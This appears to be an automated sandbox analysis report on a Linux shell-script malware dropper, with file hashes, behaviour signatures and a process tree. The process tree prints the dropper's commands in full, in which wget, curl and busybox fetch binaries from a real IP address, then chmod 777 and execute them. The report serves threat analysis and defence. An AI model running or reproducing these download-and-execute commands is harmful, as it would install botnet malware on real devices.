Analysis
-
max time kernel
91s -
max time network
94s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
25/11/2024, 02:51
Static task
static1
Behavioral task
behavioral1
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
-
Size
10KB
-
MD5
8eccec101f87a3ed0841253c005aa97f
-
SHA1
1619e034a10047b30bb121c4da04a6876dd1f076
-
SHA256
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719
-
SHA512
af180fba356f1d42cde849697eb3326d656c3e3cb1fee810d3bd038d24cf802ad4d93e67121dbb1cf54a49e67ea395a2cded2d2b457c496f069f7532054c9a33
-
SSDEEP
96:Mk0WT740kP3wjK6sX4AcqQuUHCH2HI9H1Dzf740kP3G9mt0jUjK6swUDAAcT5HCq:Mk0WTDjK6sX4AcqQurcIUK6sJMAch
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 863 chmod 875 chmod 929 chmod 935 chmod 730 chmod 851 chmod 887 chmod 917 chmod 965 chmod 737 chmod 911 chmod 947 chmod 953 chmod 959 chmod 869 chmod 905 chmod 839 chmod 845 chmod 899 chmod 971 chmod 764 chmod 824 chmod 941 chmod 881 chmod 893 chmod 923 chmod 833 chmod 857 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B 731 rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B /tmp/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef 738 d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef /tmp/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e 765 Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e /tmp/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk 825 j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk /tmp/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo 834 bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo /tmp/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6 840 Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6 /tmp/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ 846 D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ /tmp/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU 852 sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU /tmp/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z 858 CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z /tmp/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo 864 LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo /tmp/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo 870 NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo /tmp/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC 876 vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC /tmp/3L8OmStULKkoA3shg131n1guLCKtn5ohlb 882 3L8OmStULKkoA3shg131n1guLCKtn5ohlb /tmp/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI9 888 26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI9 /tmp/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6 894 Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6 /tmp/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ 900 D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ /tmp/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk 906 j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk /tmp/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo 912 bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo /tmp/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo 918 NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo /tmp/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC 924 vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC /tmp/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU 930 sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU /tmp/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z 936 CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z /tmp/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo 942 LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo /tmp/3L8OmStULKkoA3shg131n1guLCKtn5ohlb 948 3L8OmStULKkoA3shg131n1guLCKtn5ohlb /tmp/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI9 954 26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI9 /tmp/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef 960 d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef /tmp/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e 966 Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e /tmp/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B 972 rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC curl File opened for modification /tmp/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo curl File opened for modification /tmp/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo curl File opened for modification /tmp/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo curl File opened for modification /tmp/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ curl File opened for modification /tmp/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC curl File opened for modification /tmp/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z curl File opened for modification /tmp/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo curl File opened for modification /tmp/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B curl File opened for modification /tmp/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo curl File opened for modification /tmp/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z curl File opened for modification /tmp/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo curl File opened for modification /tmp/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI9 curl File opened for modification /tmp/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef curl File opened for modification /tmp/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e curl File opened for modification /tmp/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e curl File opened for modification /tmp/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6 curl File opened for modification /tmp/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ curl File opened for modification /tmp/3L8OmStULKkoA3shg131n1guLCKtn5ohlb curl File opened for modification /tmp/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B curl File opened for modification /tmp/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI9 curl File opened for modification /tmp/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk curl File opened for modification /tmp/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef curl File opened for modification /tmp/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU curl File opened for modification /tmp/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk curl File opened for modification /tmp/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU curl File opened for modification /tmp/3L8OmStULKkoA3shg131n1guLCKtn5ohlb curl File opened for modification /tmp/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6 curl
Processes
-
/tmp/aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh/tmp/aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh1⤵PID:700
-
/bin/rm/bin/rm bins.sh2⤵PID:703
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵PID:706
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:722
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵PID:729
-
-
/bin/chmodchmod 777 rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵
- File and Directory Permissions Modification
PID:730
-
-
/tmp/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B./rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵
- Executes dropped EXE
PID:731
-
-
/bin/rmrm rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵PID:733
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵PID:734
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵PID:736
-
-
/bin/chmodchmod 777 d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef./d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵
- Executes dropped EXE
PID:738
-
-
/bin/rmrm d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵PID:739
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵PID:740
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵PID:757
-
-
/bin/chmodchmod 777 Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e./Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵
- Executes dropped EXE
PID:765
-
-
/bin/rmrm Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵PID:768
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵PID:770
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵PID:791
-
-
/bin/chmodchmod 777 j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk./j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵
- Executes dropped EXE
PID:825
-
-
/bin/rmrm j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵PID:826
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵PID:827
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵PID:832
-
-
/bin/chmodchmod 777 bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo./bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵
- Executes dropped EXE
PID:834
-
-
/bin/rmrm bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵PID:835
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵PID:836
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵PID:838
-
-
/bin/chmodchmod 777 Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6./Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵PID:841
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵PID:842
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:843
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵PID:844
-
-
/bin/chmodchmod 777 D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ./D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵PID:847
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵PID:848
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵PID:850
-
-
/bin/chmodchmod 777 sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU./sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵PID:853
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵PID:854
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵PID:856
-
-
/bin/chmodchmod 777 CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z./CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵PID:859
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵PID:860
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵PID:862
-
-
/bin/chmodchmod 777 LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo./LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵PID:865
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵PID:866
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵PID:868
-
-
/bin/chmodchmod 777 NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo./NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵PID:871
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵PID:872
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵PID:874
-
-
/bin/chmodchmod 777 vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC./vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵PID:877
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵PID:878
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵PID:880
-
-
/bin/chmodchmod 777 3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/3L8OmStULKkoA3shg131n1guLCKtn5ohlb./3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm 3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵PID:883
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵PID:884
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵PID:886
-
-
/bin/chmodchmod 777 26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI9./26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm 26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵PID:889
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵PID:890
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵PID:892
-
-
/bin/chmodchmod 777 Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6./Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵PID:895
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵PID:896
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵PID:898
-
-
/bin/chmodchmod 777 D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ./D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵PID:901
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵PID:902
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵PID:904
-
-
/bin/chmodchmod 777 j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk./j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵PID:907
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵PID:908
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵PID:910
-
-
/bin/chmodchmod 777 bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo./bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵PID:913
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵PID:914
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵PID:916
-
-
/bin/chmodchmod 777 NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo./NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵PID:919
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵PID:920
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵PID:922
-
-
/bin/chmodchmod 777 vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC./vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵PID:925
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵PID:926
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵PID:928
-
-
/bin/chmodchmod 777 sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU./sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵PID:931
